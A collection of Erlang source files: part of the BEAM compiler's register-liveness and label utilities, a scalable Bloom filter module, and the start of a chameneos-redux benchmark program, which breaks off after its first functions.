bif_to_test(is_binary, [_]=Ops, Fail) -> {test,is_binary,Fail,Ops};
bif_to_test(is_bitstring,[_]=Ops, Fail) -> {test,is_bitstr,Fail,Ops};
bif_to_test(is_float, [_]=Ops, Fail) -> {test,is_float,Fail,Ops};
bif_to_test(is_function, [_]=Ops, Fail) -> {test,is_function,Fail,Ops};
bif_to_test(is_function, [_,_]=Ops, Fail) -> {test,is_function2,Fail,Ops};
bif_to_test(is_integer, [_]=Ops, Fail) -> {test,is_integer,Fail,Ops};
bif_to_test(is_list, [_]=Ops, Fail) -> {test,is_list,Fail,Ops};
bif_to_test(is_map, [_]=Ops, Fail) -> {test,is_map,Fail,Ops};
bif_to_test(is_number, [_]=Ops, Fail) -> {test,is_number,Fail,Ops};
bif_to_test(is_pid, [_]=Ops, Fail) -> {test,is_pid,Fail,Ops};
bif_to_test(is_port, [_]=Ops, Fail) -> {test,is_port,Fail,Ops};
bif_to_test(is_reference, [_]=Ops, Fail) -> {test,is_reference,Fail,Ops};
bif_to_test(is_tuple, [_]=Ops, Fail) -> {test,is_tuple,Fail,Ops};
bif_to_test('=<', [A,B], Fail) -> {test,is_ge,Fail,[B,A]};
bif_to_test('>', [A,B], Fail) -> {test,is_lt,Fail,[B,A]};
bif_to_test('<', [_,_]=Ops, Fail) -> {test,is_lt,Fail,Ops};
bif_to_test('>=', [_,_]=Ops, Fail) -> {test,is_ge,Fail,Ops};
bif_to_test('==', [C,A], Fail) when ?is_const(C) ->
{test,is_eq,Fail,[A,C]};
bif_to_test('==', [_,_]=Ops, Fail) -> {test,is_eq,Fail,Ops};
bif_to_test('/=', [C,A], Fail) when ?is_const(C) ->
{test,is_ne,Fail,[A,C]};
bif_to_test('/=', [_,_]=Ops, Fail) -> {test,is_ne,Fail,Ops};
bif_to_test('=:=', [C,A], Fail) when ?is_const(C) ->
{test,is_eq_exact,Fail,[A,C]};
bif_to_test('=:=', [_,_]=Ops, Fail) -> {test,is_eq_exact,Fail,Ops};
bif_to_test('=/=', [C,A], Fail) when ?is_const(C) ->
{test,is_ne_exact,Fail,[A,C]};
bif_to_test('=/=', [_,_]=Ops, Fail) -> {test,is_ne_exact,Fail,Ops}.
%% is_pure_test({test,Op,Fail,Ops}) -> true|false.
%% Return 'true' if the test instruction does not modify any
%% registers and/or bit syntax matching state.
%%
-spec is_pure_test(test()) -> boolean().
is_pure_test({test,is_eq,_,[_,_]}) -> true;
is_pure_test({test,is_ne,_,[_,_]}) -> true;
is_pure_test({test,is_eq_exact,_,[_,_]}) -> true;
is_pure_test({test,is_ne_exact,_,[_,_]}) -> true;
is_pure_test({test,is_ge,_,[_,_]}) -> true;
is_pure_test({test,is_lt,_,[_,_]}) -> true;
is_pure_test({test,is_nonempty_list,_,[_]}) -> true;
is_pure_test({test,is_tagged_tuple,_,[_,_,_]}) -> true;
is_pure_test({test,test_arity,_,[_,_]}) -> true;
is_pure_test({test,has_map_fields,_,[_|_]}) -> true;
is_pure_test({test,is_bitstr,_,[_]}) -> true;
is_pure_test({test,is_function2,_,[_,_]}) -> true;
is_pure_test({test,Op,_,Ops}) ->
erl_internal:new_type_test(Op, length(Ops)).
%% combine_heap_needs(HeapNeed1, HeapNeed2) -> HeapNeed
%% Combine the heap need for two allocation instructions.
-type heap_need_tag() :: 'floats' | 'words'.
-type heap_need() :: non_neg_integer() |
{'alloc',[{heap_need_tag(),non_neg_integer()}]}.
-spec combine_heap_needs(heap_need(), heap_need()) -> heap_need().
combine_heap_needs(H1, H2) when is_integer(H1), is_integer(H2) ->
H1 + H2;
combine_heap_needs(H1, H2) ->
{alloc,combine_alloc_lists([H1,H2])}.
%% split_even/1
%% [1,2,3,4,5,6] -> {[1,3,5],[2,4,6]}
-spec split_even(list()) -> {list(),list()}.
split_even(Rs) -> split_even(Rs, [], []).
%%%
%%% Local functions.
%%%
%% check_liveness(Reg, [Instruction], #live{}) ->
%% {killed | not_used | used, #live{}}
%% Find out whether Reg is used or killed in instruction sequence.
%%
%% killed - Reg is assigned or killed by an allocation instruction.
%% not_used - the value of Reg is not used, but Reg must not be garbage
%% exit_not_used - the value of Reg is not used, but must not be garbage
%% because the stack will be scanned because an
%% exit BIF will raise an exception
%% used - Reg is used
check_liveness({fr,_}, _, St) ->
%% Conservatively always consider the floating point register used.
{used,St};
check_liveness(R, [{block,Blk}|Is], St0) ->
case check_liveness_block(R, Blk, St0) of
{transparent,St1} ->
check_liveness(R, Is, St1);
{alloc_used,St1} ->
%% Used by an allocating instruction, but value not referenced.
%% Must check the rest of the instructions.
not_used(check_liveness(R, Is, St1));
{Other,_}=Res when is_atom(Other) ->
Res
end;
check_liveness(R, [{label,_}|Is], St) ->
check_liveness(R, Is, St);
check_liveness(R, [{test,_,{f,Fail},As}|Is], St0) ->
case member(R, As) of
true ->
{used,St0};
false ->
case check_liveness_at(R, Fail, St0) of
{killed,St1} ->
check_liveness(R, Is, St1);
{exit_not_used,St1} ->
not_used(check_liveness(R, Is, St1));
{not_used,St1} ->
not_used(check_liveness(R, Is, St1));
{used,_}=Used ->
Used
end
end;
check_liveness(R, [{test,Op,Fail,Live,Ss,Dst}|Is], St) ->
%% Check this instruction as a block to get a less conservative
%% result if the caller is is_not_used/3.
Block = [{set,[Dst],Ss,{alloc,Live,{bif,Op,Fail}}}],
check_liveness(R, [{block,Block}|Is], St);
check_liveness(R, [{select,_,R,_,_}|_], St) ->
{used,St};
check_liveness(R, [{select,_,_,Fail,Branches}|_], St) ->
check_liveness_everywhere(R, [Fail|Branches], St);
check_liveness(R, [{jump,{f,F}}|_], St) ->
check_liveness_at(R, F, St);
check_liveness(R, [{case_end,Used}|_], St) ->
check_liveness_exit(R, Used, St);
check_liveness(R, [{try_case_end,Used}|_], St) ->
check_liveness_exit(R, Used, St);
check_liveness(R, [{badmatch,Used}|_], St) ->
check_liveness_exit(R, Used, St);
check_liveness(R, [if_end|_], St) ->
check_liveness_exit(R, ignore, St);
check_liveness(R, [{func_info,_,_,Ar}|_], St) ->
case R of
{x,X} when X < Ar -> {used,St};
_ -> {killed,St}
end;
check_liveness(R, [{kill,R}|_], St) ->
{killed,St};
check_liveness(R, [{kill,_}|Is], St) ->
check_liveness(R, Is, St);
check_liveness(R, [{bs_init,_,_,none,Ss,Dst}|Is], St) ->
case member(R, Ss) of
true ->
{used,St};
false ->
if
R =:= Dst -> {killed,St};
true -> check_liveness(R, Is, St)
end
end;
check_liveness(R, [{bs_init,_,_,Live,Ss,Dst}|Is], St) ->
case R of
{x,X} ->
case member(R, Ss) of
true ->
{used,St};
false ->
if
X < Live ->
not_used(check_liveness(R, Is, St));
true ->
{killed,St}
end
end;
{y,_} ->
case member(R, Ss) of
true -> {used,St};
false ->
%% If the exception is taken, the stack may
%% be scanned. Therefore the register is not
%% guaranteed to be killed.
if
R =:= Dst -> {not_used,St};
true -> not_used(check_liveness(R, Is, St))
end
end
end;
check_liveness(R, [{deallocate,_}|Is], St) ->
case R of
{y,_} -> {killed,St};
_ -> check_liveness(R, Is, St)
end;
check_liveness({x,_}=R, [return|_], St) ->
case R of
{x,0} -> {used,St};
{x,_} -> {killed,St}
end;
check_liveness(R, [{call,Live,_}|Is], St) ->
case R of
{x,X} when X < Live -> {used,St};
{x,_} -> {killed,St};
{y,_} -> not_used(check_liveness(R, Is, St))
end;
check_liveness(R, [{call_ext,Live,_}=I|Is], St) ->
case R of
{x,X} when X < Live ->
{used,St};
{x,_} ->
{killed,St};
{y,_} ->
case beam_jump:is_exit_instruction(I) of
false ->
not_used(check_liveness(R, Is, St));
true ->
%% We must make sure we don't check beyond this
%% instruction or we will fall through into random
%% unrelated code and get stuck in a loop.
{exit_not_used,St}
end
end;
check_liveness(R, [{call_fun,Live}|Is], St) ->
case R of
{x,X} when X =< Live -> {used,St};
{x,_} -> {killed,St};
{y,_} -> not_used(check_liveness(R, Is, St))
end;
check_liveness(R, [{apply,Args}|Is], St) ->
case R of
{x,X} when X < Args+2 -> {used,St};
{x,_} -> {killed,St};
{y,_} -> not_used(check_liveness(R, Is, St))
end;
check_liveness(R, [{bif,Op,Fail,Ss,D}|Is], St) ->
Set = {set,[D],Ss,{bif,Op,Fail}},
check_liveness(R, [{block,[Set]}|Is], St);
check_liveness(R, [{gc_bif,Op,{f,Fail},Live,Ss,D}|Is], St) ->
Set = {set,[D],Ss,{alloc,Live,{gc_bif,Op,Fail}}},
check_liveness(R, [{block,[Set]}|Is], St);
check_liveness(R, [{bs_put,{f,0},_,Ss}|Is], St) ->
case member(R, Ss) of
true -> {used,St};
false -> check_liveness(R, Is, St)
end;
check_liveness(R, [{bs_restore2,S,_}|Is], St) ->
case R of
S -> {used,St};
_ -> check_liveness(R, Is, St)
end;
check_liveness(R, [{bs_save2,S,_}|Is], St) ->
case R of
S -> {used,St};
_ -> check_liveness(R, Is, St)
end;
check_liveness(R, [{move,S,D}|Is], St) ->
case R of
S -> {used,St};
D -> {killed,St};
_ -> check_liveness(R, Is, St)
end;
check_liveness(R, [{make_fun2,_,_,_,NumFree}|Is], St) ->
case R of
{x,X} when X < NumFree -> {used,St};
{x,_} -> {killed,St};
{y,_} -> not_used(check_liveness(R, Is, St))
end;
check_liveness(R, [{'catch'=Op,Y,Fail}|Is], St) ->
Set = {set,[Y],[],{try_catch,Op,Fail}},
check_liveness(R, [{block,[Set]}|Is], St);
check_liveness(R, [{'try'=Op,Y,Fail}|Is], St) ->
Set = {set,[Y],[],{try_catch,Op,Fail}},
check_liveness(R, [{block,[Set]}|Is], St);
check_liveness(R, [{try_end,Y}|Is], St) ->
case R of
Y ->
{killed,St};
{y,_} ->
%% y registers will be used if an exception occurs and
%% control transfers to the label given in the previous
%% try/2 instruction.
{used,St};
_ ->
check_liveness(R, Is, St)
end;
check_liveness(R, [{catch_end,Y}|Is], St) ->
case R of
Y -> {killed,St};
_ -> check_liveness(R, Is, St)
end;
check_liveness(R, [{get_tuple_element,S,_,D}|Is], St) ->
case R of
S -> {used,St};
D -> {killed,St};
_ -> check_liveness(R, Is, St)
end;
check_liveness(R, [{bs_context_to_binary,S}|Is], St) ->
case R of
S -> {used,St};
_ -> check_liveness(R, Is, St)
end;
check_liveness(R, [{loop_rec,{f,_},{x,0}}|_], St) ->
case R of
{x,_} ->
{killed,St};
_ ->
%% y register. Rarely happens. Be very conversative and
%% assume it's used.
{used,St}
end;
check_liveness(R, [{loop_rec_end,{f,Fail}}|_], St) ->
check_liveness_at(R, Fail, St);
check_liveness(R, [{line,_}|Is], St) ->
check_liveness(R, Is, St);
check_liveness(R, [{get_map_elements,{f,Fail},S,{list,L}}|Is], St0) ->
{Ss,Ds} = split_even(L),
case member(R, [S|Ss]) of
true ->
{used,St0};
false ->
case check_liveness_at(R, Fail, St0) of
{killed,St}=Killed ->
case member(R, Ds) of
true -> Killed;
false -> check_liveness(R, Is, St)
end;
Other ->
Other
end
end;
check_liveness(R, [{put_map,F,Op,S,D,Live,{list,Puts}}|Is], St) ->
Set = {set,[D],[S|Puts],{alloc,Live,{put_map,Op,F}}},
check_liveness(R, [{block,[Set]}||Is], St);
check_liveness(R, [{put_tuple,Ar,D}|Is], St) ->
Set = {set,[D],[],{put_tuple,Ar}},
check_liveness(R, [{block,[Set]}||Is], St);
check_liveness(R, [{put_list,S1,S2,D}|Is], St) ->
Set = {set,[D],[S1,S2],put_list},
check_liveness(R, [{block,[Set]}||Is], St);
check_liveness(R, [{test_heap,N,Live}|Is], St) ->
I = {block,[{set,[],[],{alloc,Live,{nozero,nostack,N,[]}}}]},
check_liveness(R, [I|Is], St);
check_liveness(R, [{allocate_zero,N,Live}|Is], St) ->
I = {block,[{set,[],[],{alloc,Live,{zero,N,0,[]}}}]},
check_liveness(R, [I|Is], St);
check_liveness(R, [{get_hd,S,D}|Is], St) ->
I = {block,[{set,[D],[S],get_hd}]},
check_liveness(R, [I|Is], St);
check_liveness(R, [{get_tl,S,D}|Is], St) ->
I = {block,[{set,[D],[S],get_tl}]},
check_liveness(R, [I|Is], St);
check_liveness(R, [remove_message|Is], St) ->
check_liveness(R, Is, St);
check_liveness({x,X}, [build_stacktrace|_], St) when X > 0 ->
{killed,St};
check_liveness(R, [{recv_mark,_}|Is], St) ->
check_liveness(R, Is, St);
check_liveness(R, [{recv_set,_}|Is], St) ->
check_liveness(R, Is, St);
check_liveness(R, [{'%',_}|Is], St) ->
check_liveness(R, Is, St);
check_liveness(_R, Is, St) when is_list(Is) ->
%% Not implemented. Conservatively assume that the register is used.
{used,St}.
check_liveness_everywhere(R, Lbls, St0) ->
check_liveness_everywhere_1(R, Lbls, killed, St0).
check_liveness_everywhere_1(R, [{f,Lbl}|T], Res0, St0) ->
{Res1,St} = check_liveness_at(R, Lbl, St0),
Res = case Res1 of
killed -> Res0;
_ -> Res1
end,
case Res of
used -> {used,St};
_ -> check_liveness_everywhere_1(R, T, Res, St)
end;
check_liveness_everywhere_1(R, [_|T], Res, St) ->
check_liveness_everywhere_1(R, T, Res, St);
check_liveness_everywhere_1(_, [], Res, St) ->
{Res,St}.
check_liveness_at(R, Lbl, #live{lbl=Ll,res=ResMemorized}=St0) ->
case gb_trees:lookup(Lbl, ResMemorized) of
{value,Res} ->
{Res,St0};
none ->
{Res,St} = case gb_trees:lookup(Lbl, Ll) of
{value,Is} -> check_liveness(R, Is, St0);
none -> {used,St0}
end,
{Res,St#live{res=gb_trees:insert(Lbl, Res, St#live.res)}}
end.
not_used({used,_}=Res) -> Res;
not_used({_,St}) -> {not_used,St}.
check_liveness_exit(R, R, St) -> {used,St};
check_liveness_exit({x,_}, _, St) -> {killed,St};
check_liveness_exit({y,_}, _, St) -> {exit_not_used,St}.
%% check_liveness_block(Reg, [Instruction], State) ->
%% {killed | not_used | used | alloc_used | transparent,State'}
%% Finds out how Reg is used in the instruction sequence inside a block.
%% Returns one of:
%% killed - Reg is assigned a new value or killed by an
%% allocation instruction
%% not_used - The value is not used, but the register is referenced
%% e.g. by an allocation instruction
%% transparent - Reg is neither used nor killed
%% alloc_used - Used only in an allocate instruction
%% used - Reg is explicitly used by an instruction
%%
%% Annotations are not allowed.
%%
%% (Unknown instructions will cause an exception.)
check_liveness_block({x,X}=R, [{set,Ds,Ss,{alloc,Live,Op}}|Is], St0) ->
if
X >= Live ->
{killed,St0};
true ->
case check_liveness_block_1(R, Ss, Ds, Op, Is, St0) of
{transparent,St} -> {alloc_used,St};
{_,_}=Res -> not_used(Res)
end
end;
check_liveness_block({y,_}=R, [{set,Ds,Ss,{alloc,_Live,Op}}|Is], St0) ->
case check_liveness_block_1(R, Ss, Ds, Op, Is, St0) of
{transparent,St} -> {alloc_used,St};
{_,_}=Res -> not_used(Res)
end;
check_liveness_block({y,_}=R, [{set,Ds,Ss,{try_catch,_,Op}}|Is], St0) ->
case Ds of
[R] ->
{killed,St0};
_ ->
case check_liveness_block_1(R, Ss, Ds, Op, Is, St0) of
{exit_not_used,St} ->
{used,St};
{transparent,St} ->
%% Conservatively assumed that it is used.
{used,St};
{_,_}=Res ->
Res
end
end;
check_liveness_block(R, [{set,Ds,Ss,Op}|Is], St) ->
check_liveness_block_1(R, Ss, Ds, Op, Is, St);
check_liveness_block(_, [], St) -> {transparent,St}.
check_liveness_block_1(R, Ss, Ds, Op, Is, St0) ->
case member(R, Ss) of
true ->
{used,St0};
false ->
case check_liveness_block_2(R, Op, Ss, St0) of
{killed,St} ->
case member(R, Ds) of
true -> {killed,St};
false -> check_liveness_block(R, Is, St)
end;
{exit_not_used,St} ->
case member(R, Ds) of
true -> {exit_not_used,St};
false -> check_liveness_block(R, Is, St)
end;
{not_used,St} ->
not_used(case member(R, Ds) of
true -> {killed,St};
false -> check_liveness_block(R, Is, St)
end);
{used,St} ->
{used,St}
end
end.
check_liveness_block_2(R, {gc_bif,Op,{f,Lbl}}, Ss, St) ->
check_liveness_block_3(R, Lbl, {Op,length(Ss)}, St);
check_liveness_block_2(R, {bif,Op,{f,Lbl}}, Ss, St) ->
Arity = length(Ss),
case erl_internal:comp_op(Op, Arity) orelse
erl_internal:new_type_test(Op, Arity) of
true ->
{killed,St};
false ->
check_liveness_block_3(R, Lbl, {Op,length(Ss)}, St)
end;
check_liveness_block_2(R, {put_map,_Op,{f,Lbl}}, _Ss, St) ->
check_liveness_block_3(R, Lbl, {unsafe,0}, St);
check_liveness_block_2(_, _, _, St) ->
{killed,St}.
check_liveness_block_3({x,_}, 0, _FA, St) ->
{killed,St};
check_liveness_block_3({y,_}, 0, {F,A}, St) ->
%% If the exception is thrown, the stack may be scanned,
%% thus implicitly using the y register.
case erl_bifs:is_safe(erlang, F, A) of
true -> {killed,St};
false -> {used,St}
end;
check_liveness_block_3(R, Lbl, _FA, St0) ->
check_liveness_at(R, Lbl, St0).
index_labels_1([{label,Lbl}|Is0], Acc) ->
Is = drop_labels(Is0),
index_labels_1(Is0, [{Lbl,Is}|Acc]);
index_labels_1([_|Is], Acc) ->
index_labels_1(Is, Acc);
index_labels_1([], Acc) -> gb_trees:from_orddict(sort(Acc)).
drop_labels([{label,_}|Is]) -> drop_labels(Is);
drop_labels(Is) -> Is.
replace_labels_1([{test,Test,{f,Lbl},Ops}|Is], Acc, D, Fb) ->
replace_labels_1(Is, [{test,Test,{f,label(Lbl, D, Fb)},Ops}|Acc], D, Fb);
replace_labels_1([{test,Test,{f,Lbl},Live,Ops,Dst}|Is], Acc, D, Fb) ->
replace_labels_1(Is, [{test,Test,{f,label(Lbl, D, Fb)},Live,Ops,Dst}|Acc], D, Fb);
replace_labels_1([{select,I,R,{f,Fail0},Vls0}|Is], Acc, D, Fb) ->
Vls = map(fun ({f,L}) -> {f,label(L, D, Fb)};
(Other) -> Other
end, Vls0),
Fail = label(Fail0, D, Fb),
replace_labels_1(Is, [{select,I,R,{f,Fail},Vls}|Acc], D, Fb);
replace_labels_1([{'try',R,{f,Lbl}}|Is], Acc, D, Fb) ->
replace_labels_1(Is, [{'try',R,{f,label(Lbl, D, Fb)}}|Acc], D, Fb);
replace_labels_1([{'catch',R,{f,Lbl}}|Is], Acc, D, Fb) ->
replace_labels_1(Is, [{'catch',R,{f,label(Lbl, D, Fb)}}|Acc], D, Fb);
replace_labels_1([{jump,{f,Lbl}}|Is], Acc, D, Fb) ->
replace_labels_1(Is, [{jump,{f,label(Lbl, D, Fb)}}|Acc], D, Fb);
replace_labels_1([{loop_rec,{f,Lbl},R}|Is], Acc, D, Fb) ->
replace_labels_1(Is, [{loop_rec,{f,label(Lbl, D, Fb)},R}|Acc], D, Fb);
replace_labels_1([{loop_rec_end,{f,Lbl}}|Is], Acc, D, Fb) ->
replace_labels_1(Is, [{loop_rec_end,{f,label(Lbl, D, Fb)}}|Acc], D, Fb);
replace_labels_1([{wait,{f,Lbl}}|Is], Acc, D, Fb) ->
replace_labels_1(Is, [{wait,{f,label(Lbl, D, Fb)}}|Acc], D, Fb);
replace_labels_1([{wait_timeout,{f,Lbl},To}|Is], Acc, D, Fb) ->
replace_labels_1(Is, [{wait_timeout,{f,label(Lbl, D, Fb)},To}|Acc], D, Fb);
replace_labels_1([{recv_mark=Op,{f,Lbl}}|Is], Acc, D, Fb) ->
replace_labels_1(Is, [{Op,{f,label(Lbl, D, Fb)}}|Acc], D, Fb);
replace_labels_1([{recv_set=Op,{f,Lbl}}|Is], Acc, D, Fb) ->
replace_labels_1(Is, [{Op,{f,label(Lbl, D, Fb)}}|Acc], D, Fb);
replace_labels_1([{bif,Name,{f,Lbl},As,R}|Is], Acc, D, Fb) when Lbl =/= 0 ->
replace_labels_1(Is, [{bif,Name,{f,label(Lbl, D, Fb)},As,R}|Acc], D, Fb);
replace_labels_1([{gc_bif,Name,{f,Lbl},Live,As,R}|Is], Acc, D, Fb) when Lbl =/= 0 ->
replace_labels_1(Is, [{gc_bif,Name,{f,label(Lbl, D, Fb)},Live,As,R}|Acc], D, Fb);
replace_labels_1([{call,Ar,{f,Lbl}}|Is], Acc, D, Fb) ->
replace_labels_1(Is, [{call,Ar,{f,label(Lbl, D, Fb)}}|Acc], D, Fb);
replace_labels_1([{make_fun2,{f,Lbl},U1,U2,U3}|Is], Acc, D, Fb) ->
replace_labels_1(Is, [{make_fun2,{f,label(Lbl, D, Fb)},U1,U2,U3}|Acc], D, Fb);
replace_labels_1([{bs_init,{f,Lbl},Info,Live,Ss,Dst}|Is], Acc, D, Fb) when Lbl =/= 0 ->
replace_labels_1(Is, [{bs_init,{f,label(Lbl, D, Fb)},Info,Live,Ss,Dst}|Acc], D, Fb);
replace_labels_1([{bs_put,{f,Lbl},Info,Ss}|Is], Acc, D, Fb) when Lbl =/= 0 ->
replace_labels_1(Is, [{bs_put,{f,label(Lbl, D, Fb)},Info,Ss}|Acc], D, Fb);
replace_labels_1([{put_map=I,{f,Lbl},Op,Src,Dst,Live,List}|Is], Acc, D, Fb)
when Lbl =/= 0 ->
replace_labels_1(Is, [{I,{f,label(Lbl, D, Fb)},Op,Src,Dst,Live,List}|Acc], D, Fb);
replace_labels_1([{get_map_elements=I,{f,Lbl},Src,List}|Is], Acc, D, Fb) when Lbl =/= 0 ->
replace_labels_1(Is, [{I,{f,label(Lbl, D, Fb)},Src,List}|Acc], D, Fb);
replace_labels_1([I|Is], Acc, D, Fb) ->
replace_labels_1(Is, [I|Acc], D, Fb);
replace_labels_1([], Acc, _, _) -> Acc.
label(Old, D, Fb) ->
case D of
#{Old := New} -> New;
_ -> Fb(Old)
end.
%% Help function for combine_heap_needs.
combine_alloc_lists(Al0) ->
Al1 = flatmap(fun(Words) when is_integer(Words) ->
[{words,Words}];
({alloc,List}) ->
List
end, Al0),
Al2 = sofs:relation(Al1),
Al3 = sofs:relation_to_family(Al2),
Al4 = sofs:to_external(Al3),
[{Tag,lists:sum(L)} || {Tag,L} <- Al4].
%% live_opt/4.
split_even([], Ss, Ds) ->
{reverse(Ss),reverse(Ds)};
split_even([S,D|Rs], Ss, Ds) ->
split_even(Rs, [S|Ss], [D|Ds]). | lib/compiler/src/beam_utils.erl | 0.522933 | 0.401658 | beam_utils.erl | starcoder |
% ``The contents of this file are subject to the Erlang Public License,
%% Version 1.1, (the "License"); you may not use this file except in
%% compliance with the License. You should have received a copy of the
%% Erlang Public License along with this software. If not, it can be
%% retrieved via the world wide web at http://www.erlang.org/.
%%
%% Software distributed under the License is distributed on an "AS IS"
%% basis, WITHOUT WARRANTY OF ANY KIND, either express or implied. See
%% the License for the specific language governing rights and limitations
%% under the License.
%%
-module(bloom).
-author("<NAME> <<EMAIL>>").
-export([sbf/1, sbf/2, sbf/3, sbf/4,
bloom/1, bloom/2,
member/2, add/2,
size/1, capacity/1]).
-export([is_element/2, add_element/2]). % alternative names
-import(math, [log/1, pow/2]).
is_element(E, B) -> member(E, B).
add_element(E, B) -> add(E, B).
%% Based on
%% Scalable Bloom Filters
%% <NAME>, <NAME>, <NAME>, <NAME>
%% Information Processing Letters
%% Volume 101, Issue 6, 31 March 2007, Pages 255-261
%%
%% Provides scalable bloom filters that can grow indefinitely while
%% ensuring a desired maximum false positive probability. Also provides
%% standard partitioned bloom filters with a maximum capacity. Bit arrays
%% are dimensioned as a power of 2 to enable reusing hash values across
%% filters through bit operations. Double hashing is used (no need for
%% enhanced double hashing for partitioned bloom filters).
%%
%% This module assumes the existence of a module called bitarray so that
%% different alternatives may be provided. To get an extremely efficient but
%% non-functional variant, hipe_bifs can be used, defining bitarray as:
%%
%%-module(bitarray).
%%-export([new/1, set/2, get/2]).
%%
%%new(Size) -> hipe_bifs:bitarray(Size, false).
%%set(I, A) -> hipe_bifs:bitarray_update(A, I, true).
%%get(I, A) -> hipe_bifs:bitarray_sub(A, I).
%%
%% A functional alternative with good lookup performance can be obtained
%% resorting to the array module. E.g.
%%
%%-module(bitarray).
%%-export([new/1, set/2, get/2]).
%%
%%-define(W, 27).
%%
%%new(N) -> array:new((N-1) div ?W + 1, {default, 0}).
%%
%%set(I, A) ->
%% AI = I div ?W,
%% V = array:get(AI, A),
%% V1 = V bor (1 bsl (I rem ?W)),
%% array:set(AI, V1, A).
%%
%%get(I, A) ->
%% AI = I div ?W,
%% V = array:get(AI, A),
%% V band (1 bsl (I rem ?W)) =/= 0.
-record(bloom, {
e, % error probability
n, % maximum number of elements
mb, % 2^mb = m, the size of each slice (bitvector)
h, % number of hashes (2: double hashing, 3: triple hashing, etc)
size, % number of elements
a % list of bitvectors
}).
-record(sbf, {
e, % error probability
r, % error probability ratio
s, % log 2 of growth ratio
size, % number of elements
b % list of plain bloom filters
}).
%% Constructors for (fixed capacity) bloom filters
%%
%% N - capacity
%% E - error probability
bloom(N) -> bloom(N, 0.001).
bloom(N, E) when is_number(N), N > 0,
is_float(E), E > 0, E < 1 ->
bloom(size, N, E).
bloom(Mode, Dim, E) ->
crypto:start(),
K = 1 + trunc(log2(1/E)),
P = pow(E, 1 / K),
case Mode of
size -> Mb = 1 + trunc(-log2(1 - pow(1 - P, 1 / Dim)));
bits -> Mb = Dim
end,
M = 1 bsl Mb,
N = trunc(log(1-P) / log(1-1/M)),
#bloom{e=E, n=N, mb=Mb, size = 0,
h = number_hashes(Mb, E),
a = [bitarray:new(1 bsl Mb) || _ <- lists:seq(1, K)]}.
log2(X) -> log(X) / log(2).
number_hashes(Mb, E) -> 2 + trunc(log2(4/E) / Mb).
%% Constructors for scalable bloom filters
%%
%% N - initial capacity before expanding
%% E - error probability
%% S - growth ratio when full (log 2) can be 1, 2 or 3
%% R - tightening ratio of error probability
sbf(N) -> sbf(N, 0.001).
sbf(N, E) -> sbf(N, E, 1).
sbf(N, E, 1) -> sbf(N, E, 1, 0.85);
sbf(N, E, 2) -> sbf(N, E, 2, 0.75);
sbf(N, E, 3) -> sbf(N, E, 3, 0.65).
sbf(N, E, S, R) when is_number(N), N > 0,
is_float(E), E > 0, E < 1,
is_integer(S), S > 0, S < 4,
is_float(R), R > 0, R < 1 ->
#sbf{e=E, s=S, r=R, size=0, b=[bloom(N, E*(1-R))]}.
%% Returns number of elements
%%
size(#bloom{size=Size}) -> Size;
size(#sbf{size=Size}) -> Size.
%% Returns capacity
%%
capacity(#bloom{n=N}) -> N;
capacity(#sbf{}) -> infinity.
%% Test for membership
%%
member(Elem, #bloom{}=B) ->
hash_member(make_hashes(B, Elem), B);
member(Elem, #sbf{b=[B|_]}=Sbf) ->
hash_member(make_hashes(B, Elem), Sbf).
hash_member(Hashes, #bloom{mb=Mb, a=A, h=H}) ->
all_set(1 bsl Mb - 1, make_indexes(H, Mb, Hashes), A);
hash_member(Hashes, #sbf{b=B}) ->
lists:any(fun(X) -> hash_member(Hashes, X) end, B).
make_hashes(_, Elem) ->
crypto:sha(term_to_binary(Elem)).
%make_hashes(#bloom{mb=Mb, h=H}, Elem) ->
%N32 = (H * Mb - 1) div 32 + 1,
%<< <<(erlang:phash2({Elem,I}, 1 bsl 32)):32>> || I <- lists:seq(1,N32) >>.
make_indexes(N, Mb, HashBits) ->
Size = Mb*N,
<<Bin:Size/bits, _/bits>> = HashBits,
Is = [I || <<I:Mb>> <= Bin],
if
N =< 4 -> list_to_tuple(Is);
true -> Is
end.
fst([H|_]) -> H;
fst(Indexes) -> element(1, Indexes).
next_idx(Mask, {I0,I1}) -> {(I0+I1) band Mask, I1};
next_idx(Mask, {I0,I1,I2}) -> {(I0+I1) band Mask, I1+I2, I2};
next_idx(Mask, {I0,I1,I2,I3}) -> {(I0+I1) band Mask, I1+I2, I2+I3, I3};
next_idx(Mask, [I0 | Is=[I1|_]]) -> [(I0+I1) band Mask | next_idx(Is)].
next_idx([I]) -> [I];
next_idx([I0 | Is=[I1|_]]) -> [I0+I1 | next_idx(Is)].
all_set(_Mask, _Indexes, []) -> true;
all_set(Mask, Indexes, [H|T]) ->
case bitarray:get(fst(Indexes), H) of
true -> all_set(Mask, next_idx(Mask, Indexes), T);
false -> false
end.
%% Adds element to set
%%
add(Elem, #bloom{}=B) -> hash_add(make_hashes(B, Elem), B);
add(Elem, #sbf{size=Size, r=R, s=S, b=[H|T]=Bs}=Sbf) ->
#bloom{mb=Mb, e=E, n=N, size=HSize} = H,
Hashes = make_hashes(H, Elem),
case hash_member(Hashes, Sbf) of
true -> Sbf;
false ->
case HSize < N of
true -> Sbf#sbf{size=Size+1, b=[hash_add(Hashes, H)|T]};
false ->
B = add(Elem, bloom(bits, Mb + S, E * R)),
Sbf#sbf{size=Size+1, b=[B|Bs]}
end
end.
hash_add(Hashes, #bloom{mb=Mb, a=A, h=H, size=Size} = B) ->
Mask = 1 bsl Mb -1,
Indexes = make_indexes(H, Mb, Hashes),
case all_set(Mask, Indexes, A) of
true -> B;
false -> B#bloom{size=Size+1, a=set_bits(Mask, Indexes, A)}
end.
set_bits(_Mask, _Indexes, []) -> [];
set_bits(Mask, Indexes, [H|T]) ->
[bitarray:set(fst(Indexes), H) | set_bits(Mask, next_idx(Mask, Indexes), T)]. | bloom.erl | 0.58522 | 0.549943 | bloom.erl | starcoder |
% The Computer Language Benchmarks Game
% http://benchmarksgame.alioth.debian.org/
%%% contributed by <NAME>
%%% modified by <NAME>
%% Each chameneos is its own process.
%% A chameneos sends {self(), Color} to the broker to request a
%% meeting with another chameneos.
%% The broker replies with {Pid, Color} of the partner met or 'stop'
%% whereupon the chameneos prints the Meetings and Selfmeetings it had
%% and replies with the number of Meetings for the broker to sum.
-module(chameneosredux).
-export([main/1]).
-import(lists, [foreach/2]).
spell(0) -> " zero";
spell(N) -> spell(N, []).
spell(0, L) -> L;
spell(N, L) -> spell(N div 10, [element(N rem 10 + 1, {" zero", " one", " two", " three", " four", " five", " six", " seven", " eight", " nine"}) | L]).
complement(C, C) -> C;
complement(blue, red) -> yellow;
complement(blue, yellow) -> red;
complement(red, blue) -> yellow;
complement(red, yellow) -> blue;
complement(yellow, blue) -> red;
